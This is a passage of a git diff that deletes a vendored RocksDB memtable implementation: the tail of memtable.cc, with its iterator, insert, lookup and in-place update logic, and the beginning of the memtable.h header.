-  // Internal keys are encoded as length-prefixed strings.
-  Slice k1 = GetLengthPrefixedSlice(prefix_len_key1);
-  Slice k2 = GetLengthPrefixedSlice(prefix_len_key2);
-  return comparator.Compare(k1, k2);
-}
-
-int MemTable::KeyComparator::operator()(const char* prefix_len_key,
-                                        const Slice& key)
-    const {
-  // Internal keys are encoded as length-prefixed strings.
-  Slice a = GetLengthPrefixedSlice(prefix_len_key);
-  return comparator.Compare(a, key);
-}
-
-Slice MemTableRep::UserKey(const char* key) const {
-  Slice slice = GetLengthPrefixedSlice(key);
-  return Slice(slice.data(), slice.size() - 8);
-}
-
-KeyHandle MemTableRep::Allocate(const size_t len, char** buf) {
-  *buf = allocator_->Allocate(len);
-  return static_cast<KeyHandle>(*buf);
-}
-
-// Encode a suitable internal key target for "target" and return it.
-// Uses *scratch as scratch space, and the returned pointer will point
-// into this scratch space.
-const char* EncodeKey(std::string* scratch, const Slice& target) {
-  scratch->clear();
-  PutVarint32(scratch, static_cast<uint32_t>(target.size()));
-  scratch->append(target.data(), target.size());
-  return scratch->data();
-}
-
-class MemTableIterator : public InternalIterator {
- public:
-  MemTableIterator(const MemTable& mem, const ReadOptions& read_options,
-                   Arena* arena, bool use_range_del_table = false)
-      : bloom_(nullptr),
-        prefix_extractor_(mem.prefix_extractor_),
-        comparator_(mem.comparator_),
-        valid_(false),
-        arena_mode_(arena != nullptr),
-        value_pinned_(
-            !mem.GetImmutableMemTableOptions()->inplace_update_support) {
-    if (use_range_del_table) {
-      iter_ = mem.range_del_table_->GetIterator(arena);
-    } else if (prefix_extractor_ != nullptr && !read_options.total_order_seek) {
-      bloom_ = mem.prefix_bloom_.get();
-      iter_ = mem.table_->GetDynamicPrefixIterator(arena);
-    } else {
-      iter_ = mem.table_->GetIterator(arena);
-    }
-  }
-
-  ~MemTableIterator() {
-#ifndef NDEBUG
-    // Assert that the MemTableIterator is never deleted while
-    // Pinning is Enabled.
-    assert(!pinned_iters_mgr_ ||
-           (pinned_iters_mgr_ && !pinned_iters_mgr_->PinningEnabled()));
-#endif
-    if (arena_mode_) {
-      iter_->~Iterator();
-    } else {
-      delete iter_;
-    }
-  }
-
-#ifndef NDEBUG
-  virtual void SetPinnedItersMgr(
-      PinnedIteratorsManager* pinned_iters_mgr) override {
-    pinned_iters_mgr_ = pinned_iters_mgr;
-  }
-  PinnedIteratorsManager* pinned_iters_mgr_ = nullptr;
-#endif
-
-  virtual bool Valid() const override { return valid_; }
-  virtual void Seek(const Slice& k) override {
-    PERF_TIMER_GUARD(seek_on_memtable_time);
-    PERF_COUNTER_ADD(seek_on_memtable_count, 1);
-    if (bloom_ != nullptr) {
-      if (!bloom_->MayContain(
-              prefix_extractor_->Transform(ExtractUserKey(k)))) {
-        PERF_COUNTER_ADD(bloom_memtable_miss_count, 1);
-        valid_ = false;
-        return;
-      } else {
-        PERF_COUNTER_ADD(bloom_memtable_hit_count, 1);
-      }
-    }
-    iter_->Seek(k, nullptr);
-    valid_ = iter_->Valid();
-  }
-  virtual void SeekForPrev(const Slice& k) override {
-    PERF_TIMER_GUARD(seek_on_memtable_time);
-    PERF_COUNTER_ADD(seek_on_memtable_count, 1);
-    if (bloom_ != nullptr) {
-      if (!bloom_->MayContain(
-              prefix_extractor_->Transform(ExtractUserKey(k)))) {
-        PERF_COUNTER_ADD(bloom_memtable_miss_count, 1);
-        valid_ = false;
-        return;
-      } else {
-        PERF_COUNTER_ADD(bloom_memtable_hit_count, 1);
-      }
-    }
-    iter_->Seek(k, nullptr);
-    valid_ = iter_->Valid();
-    if (!Valid()) {
-      SeekToLast();
-    }
-    while (Valid() && comparator_.comparator.Compare(k, key()) < 0) {
-      Prev();
-    }
-  }
-  virtual void SeekToFirst() override {
-    iter_->SeekToFirst();
-    valid_ = iter_->Valid();
-  }
-  virtual void SeekToLast() override {
-    iter_->SeekToLast();
-    valid_ = iter_->Valid();
-  }
-  virtual void Next() override {
-    PERF_COUNTER_ADD(next_on_memtable_count, 1);
-    assert(Valid());
-    iter_->Next();
-    valid_ = iter_->Valid();
-  }
-  virtual void Prev() override {
-    PERF_COUNTER_ADD(prev_on_memtable_count, 1);
-    assert(Valid());
-    iter_->Prev();
-    valid_ = iter_->Valid();
-  }
-  virtual Slice key() const override {
-    assert(Valid());
-    return GetLengthPrefixedSlice(iter_->key());
-  }
-  virtual Slice value() const override {
-    assert(Valid());
-    Slice key_slice = GetLengthPrefixedSlice(iter_->key());
-    return GetLengthPrefixedSlice(key_slice.data() + key_slice.size());
-  }
-
-  virtual Status status() const override { return Status::OK(); }
-
-  virtual bool IsKeyPinned() const override {
-    // memtable data is always pinned
-    return true;
-  }
-
-  virtual bool IsValuePinned() const override {
-    // memtable value is always pinned, except if we allow inplace update.
-    return value_pinned_;
-  }
-
- private:
-  DynamicBloom* bloom_;
-  const SliceTransform* const prefix_extractor_;
-  const MemTable::KeyComparator comparator_;
-  MemTableRep::Iterator* iter_;
-  bool valid_;
-  bool arena_mode_;
-  bool value_pinned_;
-
-  // No copying allowed
-  MemTableIterator(const MemTableIterator&);
-  void operator=(const MemTableIterator&);
-};
-
-InternalIterator* MemTable::NewIterator(const ReadOptions& read_options,
-                                        Arena* arena) {
-  assert(arena != nullptr);
-  auto mem = arena->AllocateAligned(sizeof(MemTableIterator));
-  return new (mem) MemTableIterator(*this, read_options, arena);
-}
-
-InternalIterator* MemTable::NewRangeTombstoneIterator(
-    const ReadOptions& read_options) {
-  if (read_options.ignore_range_deletions || is_range_del_table_empty_) {
-    return nullptr;
-  }
-  return new MemTableIterator(*this, read_options, nullptr /* arena */,
-                              true /* use_range_del_table */);
-}
-
-port::RWMutex* MemTable::GetLock(const Slice& key) {
-  static murmur_hash hash;
-  return &locks_[hash(key) % locks_.size()];
-}
-
-MemTable::MemTableStats MemTable::ApproximateStats(const Slice& start_ikey,
-                                                   const Slice& end_ikey) {
-  uint64_t entry_count = table_->ApproximateNumEntries(start_ikey, end_ikey);
-  entry_count += range_del_table_->ApproximateNumEntries(start_ikey, end_ikey);
-  if (entry_count == 0) {
-    return {0, 0};
-  }
-  uint64_t n = num_entries_.load(std::memory_order_relaxed);
-  if (n == 0) {
-    return {0, 0};
-  }
-  if (entry_count > n) {
-    // (range_del_)table_->ApproximateNumEntries() is just an estimate so it can
-    // be larger than actual entries we have. Cap it to entries we have to limit
-    // the inaccuracy.
-    entry_count = n;
-  }
-  uint64_t data_size = data_size_.load(std::memory_order_relaxed);
-  return {entry_count * (data_size / n), entry_count};
-}
-
-void MemTable::Add(SequenceNumber s, ValueType type,
-                   const Slice& key, /* user key */
-                   const Slice& value, bool allow_concurrent,
-                   MemTablePostProcessInfo* post_process_info) {
-  // Format of an entry is concatenation of:
-  //  key_size     : varint32 of internal_key.size()
-  //  key bytes    : char[internal_key.size()]
-  //  value_size   : varint32 of value.size()
-  //  value bytes  : char[value.size()]
-  uint32_t key_size = static_cast<uint32_t>(key.size());
-  uint32_t val_size = static_cast<uint32_t>(value.size());
-  uint32_t internal_key_size = key_size + 8;
-  const uint32_t encoded_len = VarintLength(internal_key_size) +
-                               internal_key_size + VarintLength(val_size) +
-                               val_size;
-  char* buf = nullptr;
-  std::unique_ptr<MemTableRep>& table =
-      type == kTypeRangeDeletion ? range_del_table_ : table_;
-  KeyHandle handle = table->Allocate(encoded_len, &buf);
-
-  char* p = EncodeVarint32(buf, internal_key_size);
-  memcpy(p, key.data(), key_size);
-  Slice key_slice(p, key_size);
-  p += key_size;
-  uint64_t packed = PackSequenceAndType(s, type);
-  EncodeFixed64(p, packed);
-  p += 8;
-  p = EncodeVarint32(p, val_size);
-  memcpy(p, value.data(), val_size);
-  assert((unsigned)(p + val_size - buf) == (unsigned)encoded_len);
-  if (!allow_concurrent) {
-    // Extract prefix for insert with hint.
-    if (insert_with_hint_prefix_extractor_ != nullptr &&
-        insert_with_hint_prefix_extractor_->InDomain(key_slice)) {
-      Slice prefix = insert_with_hint_prefix_extractor_->Transform(key_slice);
-      table->InsertWithHint(handle, &insert_hints_[prefix]);
-    } else {
-      table->Insert(handle);
-    }
-
-    // this is a bit ugly, but is the way to avoid locked instructions
-    // when incrementing an atomic
-    num_entries_.store(num_entries_.load(std::memory_order_relaxed) + 1,
-                       std::memory_order_relaxed);
-    data_size_.store(data_size_.load(std::memory_order_relaxed) + encoded_len,
-                     std::memory_order_relaxed);
-    if (type == kTypeDeletion) {
-      num_deletes_.store(num_deletes_.load(std::memory_order_relaxed) + 1,
-                         std::memory_order_relaxed);
-    }
-
-    if (prefix_bloom_) {
-      assert(prefix_extractor_);
-      prefix_bloom_->Add(prefix_extractor_->Transform(key));
-    }
-
-    // The first sequence number inserted into the memtable
-    assert(first_seqno_ == 0 || s > first_seqno_);
-    if (first_seqno_ == 0) {
-      first_seqno_.store(s, std::memory_order_relaxed);
-
-      if (earliest_seqno_ == kMaxSequenceNumber) {
-        earliest_seqno_.store(GetFirstSequenceNumber(),
-                              std::memory_order_relaxed);
-      }
-      assert(first_seqno_.load() >= earliest_seqno_.load());
-    }
-    assert(post_process_info == nullptr);
-    UpdateFlushState();
-  } else {
-    table->InsertConcurrently(handle);
-
-    assert(post_process_info != nullptr);
-    post_process_info->num_entries++;
-    post_process_info->data_size += encoded_len;
-    if (type == kTypeDeletion) {
-      post_process_info->num_deletes++;
-    }
-
-    if (prefix_bloom_) {
-      assert(prefix_extractor_);
-      prefix_bloom_->AddConcurrently(prefix_extractor_->Transform(key));
-    }
-
-    // atomically update first_seqno_ and earliest_seqno_.
-    uint64_t cur_seq_num = first_seqno_.load(std::memory_order_relaxed);
-    while ((cur_seq_num == 0 || s < cur_seq_num) &&
-           !first_seqno_.compare_exchange_weak(cur_seq_num, s)) {
-    }
-    uint64_t cur_earliest_seqno =
-        earliest_seqno_.load(std::memory_order_relaxed);
-    while (
-        (cur_earliest_seqno == kMaxSequenceNumber || s < cur_earliest_seqno) &&
-        !first_seqno_.compare_exchange_weak(cur_earliest_seqno, s)) {
-    }
-  }
-  if (is_range_del_table_empty_ && type == kTypeRangeDeletion) {
-    is_range_del_table_empty_ = false;
-  }
-  UpdateOldestKeyTime();
-}
-
-// Callback from MemTable::Get()
-namespace {
-
-struct Saver {
-  Status* status;
-  const LookupKey* key;
-  bool* found_final_value;  // Is value set correctly? Used by KeyMayExist
-  bool* merge_in_progress;
-  std::string* value;
-  SequenceNumber seq;
-  const MergeOperator* merge_operator;
-  // the merge operations encountered;
-  MergeContext* merge_context;
-  RangeDelAggregator* range_del_agg;
-  MemTable* mem;
-  Logger* logger;
-  Statistics* statistics;
-  bool inplace_update_support;
-  Env* env_;
-  bool* is_blob_index;
-};
-}  // namespace
-
-static bool SaveValue(void* arg, const char* entry) {
-  Saver* s = reinterpret_cast<Saver*>(arg);
-  MergeContext* merge_context = s->merge_context;
-  RangeDelAggregator* range_del_agg = s->range_del_agg;
-  const MergeOperator* merge_operator = s->merge_operator;
-
-  assert(s != nullptr && merge_context != nullptr && range_del_agg != nullptr);
-
-  // entry format is:
-  //    klength  varint32
-  //    userkey  char[klength-8]
-  //    tag      uint64
-  //    vlength  varint32
-  //    value    char[vlength]
-  // Check that it belongs to same user key.  We do not check the
-  // sequence number since the Seek() call above should have skipped
-  // all entries with overly large sequence numbers.
-  uint32_t key_length;
-  const char* key_ptr = GetVarint32Ptr(entry, entry + 5, &key_length);
-  if (s->mem->GetInternalKeyComparator().user_comparator()->Equal(
-          Slice(key_ptr, key_length - 8), s->key->user_key())) {
-    // Correct user key
-    const uint64_t tag = DecodeFixed64(key_ptr + key_length - 8);
-    ValueType type;
-    UnPackSequenceAndType(tag, &s->seq, &type);
-
-    if ((type == kTypeValue || type == kTypeMerge || type == kTypeBlobIndex) &&
-        range_del_agg->ShouldDelete(Slice(key_ptr, key_length))) {
-      type = kTypeRangeDeletion;
-    }
-    switch (type) {
-      case kTypeBlobIndex:
-        if (s->is_blob_index == nullptr) {
-          ROCKS_LOG_ERROR(s->logger, "Encounter unexpected blob index.");
-          *(s->status) = Status::NotSupported(
-              "Encounter unsupported blob value. Please open DB with "
-              "rocksdb::blob_db::BlobDB instead.");
-        } else if (*(s->merge_in_progress)) {
-          *(s->status) =
-              Status::NotSupported("Blob DB does not support merge operator.");
-        }
-        if (!s->status->ok()) {
-          *(s->found_final_value) = true;
-          return false;
-        }
-      // intentional fallthrough
-      case kTypeValue: {
-        if (s->inplace_update_support) {
-          s->mem->GetLock(s->key->user_key())->ReadLock();
-        }
-        Slice v = GetLengthPrefixedSlice(key_ptr + key_length);
-        *(s->status) = Status::OK();
-        if (*(s->merge_in_progress)) {
-          *(s->status) = MergeHelper::TimedFullMerge(
-              merge_operator, s->key->user_key(), &v,
-              merge_context->GetOperands(), s->value, s->logger, s->statistics,
-              s->env_, nullptr /* result_operand */, true);
-        } else if (s->value != nullptr) {
-          s->value->assign(v.data(), v.size());
-        }
-        if (s->inplace_update_support) {
-          s->mem->GetLock(s->key->user_key())->ReadUnlock();
-        }
-        *(s->found_final_value) = true;
-        if (s->is_blob_index != nullptr) {
-          *(s->is_blob_index) = (type == kTypeBlobIndex);
-        }
-        return false;
-      }
-      case kTypeDeletion:
-      case kTypeSingleDeletion:
-      case kTypeRangeDeletion: {
-        if (*(s->merge_in_progress)) {
-          *(s->status) = MergeHelper::TimedFullMerge(
-              merge_operator, s->key->user_key(), nullptr,
-              merge_context->GetOperands(), s->value, s->logger, s->statistics,
-              s->env_, nullptr /* result_operand */, true);
-        } else {
-          *(s->status) = Status::NotFound();
-        }
-        *(s->found_final_value) = true;
-        return false;
-      }
-      case kTypeMerge: {
-        if (!merge_operator) {
-          *(s->status) = Status::InvalidArgument(
-              "merge_operator is not properly initialized.");
-          // Normally we continue the loop (return true) when we see a merge
-          // operand.  But in case of an error, we should stop the loop
-          // immediately and pretend we have found the value to stop further
-          // seek.  Otherwise, the later call will override this error status.
-          *(s->found_final_value) = true;
-          return false;
-        }
-        Slice v = GetLengthPrefixedSlice(key_ptr + key_length);
-        *(s->merge_in_progress) = true;
-        merge_context->PushOperand(
-            v, s->inplace_update_support == false /* operand_pinned */);
-        return true;
-      }
-      default:
-        assert(false);
-        return true;
-    }
-  }
-
-  // s->state could be Corrupt, merge or notfound
-  return false;
-}
-
-bool MemTable::Get(const LookupKey& key, std::string* value, Status* s,
-                   MergeContext* merge_context,
-                   RangeDelAggregator* range_del_agg, SequenceNumber* seq,
-                   const ReadOptions& read_opts, bool* is_blob_index) {
-  // The sequence number is updated synchronously in version_set.h
-  if (IsEmpty()) {
-    // Avoiding recording stats for speed.
-    return false;
-  }
-  PERF_TIMER_GUARD(get_from_memtable_time);
-
-  std::unique_ptr<InternalIterator> range_del_iter(
-      NewRangeTombstoneIterator(read_opts));
-  Status status = range_del_agg->AddTombstones(std::move(range_del_iter));
-  if (!status.ok()) {
-    *s = status;
-    return false;
-  }
-
-  Slice user_key = key.user_key();
-  bool found_final_value = false;
-  bool merge_in_progress = s->IsMergeInProgress();
-  bool const may_contain =
-      nullptr == prefix_bloom_
-          ? false
-          : prefix_bloom_->MayContain(prefix_extractor_->Transform(user_key));
-  if (prefix_bloom_ && !may_contain) {
-    // iter is null if prefix bloom says the key does not exist
-    PERF_COUNTER_ADD(bloom_memtable_miss_count, 1);
-    *seq = kMaxSequenceNumber;
-  } else {
-    if (prefix_bloom_) {
-      PERF_COUNTER_ADD(bloom_memtable_hit_count, 1);
-    }
-    Saver saver;
-    saver.status = s;
-    saver.found_final_value = &found_final_value;
-    saver.merge_in_progress = &merge_in_progress;
-    saver.key = &key;
-    saver.value = value;
-    saver.seq = kMaxSequenceNumber;
-    saver.mem = this;
-    saver.merge_context = merge_context;
-    saver.range_del_agg = range_del_agg;
-    saver.merge_operator = moptions_.merge_operator;
-    saver.logger = moptions_.info_log;
-    saver.inplace_update_support = moptions_.inplace_update_support;
-    saver.statistics = moptions_.statistics;
-    saver.env_ = env_;
-    saver.is_blob_index = is_blob_index;
-    table_->Get(key, &saver, SaveValue);
-
-    *seq = saver.seq;
-  }
-
-  // No change to value, since we have not yet found a Put/Delete
-  if (!found_final_value && merge_in_progress) {
-    *s = Status::MergeInProgress();
-  }
-  PERF_COUNTER_ADD(get_from_memtable_count, 1);
-  return found_final_value;
-}
-
-void MemTable::Update(SequenceNumber seq,
-                      const Slice& key,
-                      const Slice& value) {
-  LookupKey lkey(key, seq);
-  Slice mem_key = lkey.memtable_key();
-
-  std::unique_ptr<MemTableRep::Iterator> iter(
-      table_->GetDynamicPrefixIterator());
-  iter->Seek(lkey.internal_key(), mem_key.data());
-
-  if (iter->Valid()) {
-    // entry format is:
-    //    key_length  varint32
-    //    userkey  char[klength-8]
-    //    tag      uint64
-    //    vlength  varint32
-    //    value    char[vlength]
-    // Check that it belongs to same user key.  We do not check the
-    // sequence number since the Seek() call above should have skipped
-    // all entries with overly large sequence numbers.
-    const char* entry = iter->key();
-    uint32_t key_length = 0;
-    const char* key_ptr = GetVarint32Ptr(entry, entry + 5, &key_length);
-    if (comparator_.comparator.user_comparator()->Equal(
-            Slice(key_ptr, key_length - 8), lkey.user_key())) {
-      // Correct user key
-      const uint64_t tag = DecodeFixed64(key_ptr + key_length - 8);
-      ValueType type;
-      SequenceNumber unused;
-      UnPackSequenceAndType(tag, &unused, &type);
-      if (type == kTypeValue) {
-        Slice prev_value = GetLengthPrefixedSlice(key_ptr + key_length);
-        uint32_t prev_size = static_cast<uint32_t>(prev_value.size());
-        uint32_t new_size = static_cast<uint32_t>(value.size());
-
-        // Update value, if new value size  <= previous value size
-        if (new_size <= prev_size) {
-          char* p =
-              EncodeVarint32(const_cast<char*>(key_ptr) + key_length, new_size);
-          WriteLock wl(GetLock(lkey.user_key()));
-          memcpy(p, value.data(), value.size());
-          assert((unsigned)((p + value.size()) - entry) ==
-                 (unsigned)(VarintLength(key_length) + key_length +
-                            VarintLength(value.size()) + value.size()));
-          return;
-        }
-      }
-    }
-  }
-
-  // key doesn't exist
-  Add(seq, kTypeValue, key, value);
-}
-
-bool MemTable::UpdateCallback(SequenceNumber seq,
-                              const Slice& key,
-                              const Slice& delta) {
-  LookupKey lkey(key, seq);
-  Slice memkey = lkey.memtable_key();
-
-  std::unique_ptr<MemTableRep::Iterator> iter(
-      table_->GetDynamicPrefixIterator());
-  iter->Seek(lkey.internal_key(), memkey.data());
-
-  if (iter->Valid()) {
-    // entry format is:
-    //    key_length  varint32
-    //    userkey  char[klength-8]
-    //    tag      uint64
-    //    vlength  varint32
-    //    value    char[vlength]
-    // Check that it belongs to same user key.  We do not check the
-    // sequence number since the Seek() call above should have skipped
-    // all entries with overly large sequence numbers.
-    const char* entry = iter->key();
-    uint32_t key_length = 0;
-    const char* key_ptr = GetVarint32Ptr(entry, entry + 5, &key_length);
-    if (comparator_.comparator.user_comparator()->Equal(
-            Slice(key_ptr, key_length - 8), lkey.user_key())) {
-      // Correct user key
-      const uint64_t tag = DecodeFixed64(key_ptr + key_length - 8);
-      ValueType type;
-      uint64_t unused;
-      UnPackSequenceAndType(tag, &unused, &type);
-      switch (type) {
-        case kTypeValue: {
-          Slice prev_value = GetLengthPrefixedSlice(key_ptr + key_length);
-          uint32_t prev_size = static_cast<uint32_t>(prev_value.size());
-
-          char* prev_buffer = const_cast<char*>(prev_value.data());
-          uint32_t new_prev_size = prev_size;
-
-          std::string str_value;
-          WriteLock wl(GetLock(lkey.user_key()));
-          auto status = moptions_.inplace_callback(prev_buffer, &new_prev_size,
-                                                   delta, &str_value);
-          if (status == UpdateStatus::UPDATED_INPLACE) {
-            // Value already updated by callback.
-            assert(new_prev_size <= prev_size);
-            if (new_prev_size < prev_size) {
-              // overwrite the new prev_size
-              char* p = EncodeVarint32(const_cast<char*>(key_ptr) + key_length,
-                                       new_prev_size);
-              if (VarintLength(new_prev_size) < VarintLength(prev_size)) {
-                // shift the value buffer as well.
-                memcpy(p, prev_buffer, new_prev_size);
-              }
-            }
-            RecordTick(moptions_.statistics, NUMBER_KEYS_UPDATED);
-            UpdateFlushState();
-            return true;
-          } else if (status == UpdateStatus::UPDATED) {
-            Add(seq, kTypeValue, key, Slice(str_value));
-            RecordTick(moptions_.statistics, NUMBER_KEYS_WRITTEN);
-            UpdateFlushState();
-            return true;
-          } else if (status == UpdateStatus::UPDATE_FAILED) {
-            // No action required. Return.
-            UpdateFlushState();
-            return true;
-          }
-        }
-        default:
-          break;
-      }
-    }
-  }
-  // If the latest value is not kTypeValue
-  // or key doesn't exist
-  return false;
-}
-
-size_t MemTable::CountSuccessiveMergeEntries(const LookupKey& key) {
-  Slice memkey = key.memtable_key();
-
-  // A total ordered iterator is costly for some memtablerep (prefix aware
-  // reps). By passing in the user key, we allow efficient iterator creation.
-  // The iterator only needs to be ordered within the same user key.
-  std::unique_ptr<MemTableRep::Iterator> iter(
-      table_->GetDynamicPrefixIterator());
-  iter->Seek(key.internal_key(), memkey.data());
-
-  size_t num_successive_merges = 0;
-
-  for (; iter->Valid(); iter->Next()) {
-    const char* entry = iter->key();
-    uint32_t key_length = 0;
-    const char* iter_key_ptr = GetVarint32Ptr(entry, entry + 5, &key_length);
-    if (!comparator_.comparator.user_comparator()->Equal(
-            Slice(iter_key_ptr, key_length - 8), key.user_key())) {
-      break;
-    }
-
-    const uint64_t tag = DecodeFixed64(iter_key_ptr + key_length - 8);
-    ValueType type;
-    uint64_t unused;
-    UnPackSequenceAndType(tag, &unused, &type);
-    if (type != kTypeMerge) {
-      break;
-    }
-
-    ++num_successive_merges;
-  }
-
-  return num_successive_merges;
-}
-
-void MemTableRep::Get(const LookupKey& k, void* callback_args,
-                      bool (*callback_func)(void* arg, const char* entry)) {
-  auto iter = GetDynamicPrefixIterator();
-  for (iter->Seek(k.internal_key(), k.memtable_key().data());
-       iter->Valid() && callback_func(callback_args, iter->key());
-       iter->Next()) {
-  }
-}
-
-void MemTable::RefLogContainingPrepSection(uint64_t log) {
-  assert(log > 0);
-  auto cur = min_prep_log_referenced_.load();
-  while ((log < cur || cur == 0) &&
-         !min_prep_log_referenced_.compare_exchange_strong(cur, log)) {
-    cur = min_prep_log_referenced_.load();
-  }
-}
-
-uint64_t MemTable::GetMinLogContainingPrepSection() {
-  return min_prep_log_referenced_.load();
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/memtable.h b/thirdparty/rocksdb/db/memtable.h
deleted file mode 100644
index 4f63818..0000000
--- a/thirdparty/rocksdb/db/memtable.h
+++ /dev/null
@@ -1,453 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <atomic>
-#include <deque>
-#include <functional>
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <vector>
-#include "db/dbformat.h"
-#include "db/range_del_aggregator.h"
-#include "db/version_edit.h"
-#include "monitoring/instrumented_mutex.h"
-#include "options/cf_options.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "util/allocator.h"
-#include "util/concurrent_arena.h"
-#include "util/dynamic_bloom.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-class Mutex;
-class MemTableIterator;
-class MergeContext;
-class InternalIterator;
-
-struct ImmutableMemTableOptions {
-  explicit ImmutableMemTableOptions(const ImmutableCFOptions& ioptions,
-                                    const MutableCFOptions& mutable_cf_options);
-  size_t arena_block_size;
-  uint32_t memtable_prefix_bloom_bits;
-  size_t memtable_huge_page_size;
-  bool inplace_update_support;
-  size_t inplace_update_num_locks;
-  UpdateStatus (*inplace_callback)(char* existing_value,
-                                   uint32_t* existing_value_size,
-                                   Slice delta_value,
-                                   std::string* merged_value);
-  size_t max_successive_merges;
-  Statistics* statistics;
-  MergeOperator* merge_operator;
-  Logger* info_log;
-};
-
-// Batched counters to updated when inserting keys in one write batch.
-// In post process of the write batch, these can be updated together.
-// Only used in concurrent memtable insert case.
-struct MemTablePostProcessInfo {
-  uint64_t data_size = 0;
-  uint64_t num_entries = 0;
-  uint64_t num_deletes = 0;
-};
-
-// Note:  Many of the methods in this class have comments indicating that
-// external synchromization is required as these methods are not thread-safe.
-// It is up to higher layers of code to decide how to prevent concurrent
-// invokation of these methods.  This is usually done by acquiring either
-// the db mutex or the single writer thread.
-//
-// Some of these methods are documented to only require external
-// synchronization if this memtable is immutable.  Calling MarkImmutable() is
-// not sufficient to guarantee immutability.  It is up to higher layers of
-// code to determine if this MemTable can still be modified by other threads.
-// Eg: The Superversion stores a pointer to the current MemTable (that can
-// be modified) and a separate list of the MemTables that can no longer be
-// written to (aka the 'immutable memtables').
-class MemTable {
- public:
-  struct KeyComparator : public MemTableRep::KeyComparator {
-    const InternalKeyComparator comparator;
-    explicit KeyComparator(const InternalKeyComparator& c) : comparator(c) { }
-    virtual int operator()(const char* prefix_len_key1,
-                           const char* prefix_len_key2) const override;
-    virtual int operator()(const char* prefix_len_key,
-                           const Slice& key) const override;
-  };
-
-  // MemTables are reference counted.  The initial reference count
-  // is zero and the caller must call Ref() at least once.
-  //
-  // earliest_seq should be the current SequenceNumber in the db such that any
-  // key inserted into this memtable will have an equal or larger seq number.
-  // (When a db is first created, the earliest sequence number will be 0).
-  // If the earliest sequence number is not known, kMaxSequenceNumber may be
-  // used, but this may prevent some transactions from succeeding until the
-  // first key is inserted into the memtable.
-  explicit MemTable(const InternalKeyComparator& comparator,
-                    const ImmutableCFOptions& ioptions,
-                    const MutableCFOptions& mutable_cf_options,
-                    WriteBufferManager* write_buffer_manager,
-                    SequenceNumber earliest_seq, uint32_t column_family_id);
-
-  // Do not delete this MemTable unless Unref() indicates it not in use.
-  ~MemTable();
-
-  // Increase reference count.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  void Ref() { ++refs_; }
-
-  // Drop reference count.
-  // If the refcount goes to zero return this memtable, otherwise return null.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  MemTable* Unref() {
-    --refs_;
-    assert(refs_ >= 0);
-    if (refs_ <= 0) {
-      return this;
-    }
-    return nullptr;
-  }
-
-  // Returns an estimate of the number of bytes of data in use by this
-  // data structure.
-  //
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable (unless this Memtable is immutable).
-  size_t ApproximateMemoryUsage();
-
-  // This method heuristically determines if the memtable should continue to
-  // host more data.
-  bool ShouldScheduleFlush() const {
-    return flush_state_.load(std::memory_order_relaxed) == FLUSH_REQUESTED;
-  }
-
-  // Returns true if a flush should be scheduled and the caller should
-  // be the one to schedule it
-  bool MarkFlushScheduled() {
-    auto before = FLUSH_REQUESTED;
-    return flush_state_.compare_exchange_strong(before, FLUSH_SCHEDULED,
-                                                std::memory_order_relaxed,
-                                                std::memory_order_relaxed);
-  }
-
-  // Return an iterator that yields the contents of the memtable.
-  //
-  // The caller must ensure that the underlying MemTable remains live
-  // while the returned iterator is live.  The keys returned by this
-  // iterator are internal keys encoded by AppendInternalKey in the
-  // db/dbformat.{h,cc} module.
-  //
-  // By default, it returns an iterator for prefix seek if prefix_extractor
-  // is configured in Options.
-  // arena: If not null, the arena needs to be used to allocate the Iterator.
-  //        Calling ~Iterator of the iterator will destroy all the states but
-  //        those allocated in arena.
-  InternalIterator* NewIterator(const ReadOptions& read_options, Arena* arena);
-
-  InternalIterator* NewRangeTombstoneIterator(const ReadOptions& read_options);
-
-  // Add an entry into memtable that maps key to value at the
-  // specified sequence number and with the specified type.
-  // Typically value will be empty if type==kTypeDeletion.
-  //
-  // REQUIRES: if allow_concurrent = false, external synchronization to prevent
-  // simultaneous operations on the same MemTable.
-  void Add(SequenceNumber seq, ValueType type, const Slice& key,
-           const Slice& value, bool allow_concurrent = false,
-           MemTablePostProcessInfo* post_process_info = nullptr);
-
-  // If memtable contains a value for key, store it in *value and return true.
-  // If memtable contains a deletion for key, store a NotFound() error
-  // in *status and return true.
-  // If memtable contains Merge operation as the most recent entry for a key,
-  //   and the merge process does not stop (not reaching a value or delete),
-  //   prepend the current merge operand to *operands.
-  //   store MergeInProgress in s, and return false.
-  // Else, return false.
-  // If any operation was found, its most recent sequence number
-  // will be stored in *seq on success (regardless of whether true/false is
-  // returned).  Otherwise, *seq will be set to kMaxSequenceNumber.
-  // On success, *s may be set to OK, NotFound, or MergeInProgress.  Any other
-  // status returned indicates a corruption or other unexpected error.
-  bool Get(const LookupKey& key, std::string* value, Status* s,
-           MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-           SequenceNumber* seq, const ReadOptions& read_opts,
-           bool* is_blob_index = nullptr);
-
-  bool Get(const LookupKey& key, std::string* value, Status* s,
-           MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-           const ReadOptions& read_opts, bool* is_blob_index = nullptr) {
-    SequenceNumber seq;
-    return Get(key, value, s, merge_context, range_del_agg, &seq, read_opts,
-               is_blob_index);
-  }
-
-  // Attempts to update the new_value inplace, else does normal Add
-  // Pseudocode
-  //   if key exists in current memtable && prev_value is of type kTypeValue
-  //     if new sizeof(new_value) <= sizeof(prev_value)
-  //       update inplace
-  //     else add(key, new_value)
-  //   else add(key, new_value)
-  //
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  void Update(SequenceNumber seq,
-              const Slice& key,
-              const Slice& value);
-
-  // If prev_value for key exists, attempts to update it inplace.
-  // else returns false
-  // Pseudocode
-  //   if key exists in current memtable && prev_value is of type kTypeValue
-  //     new_value = delta(prev_value)
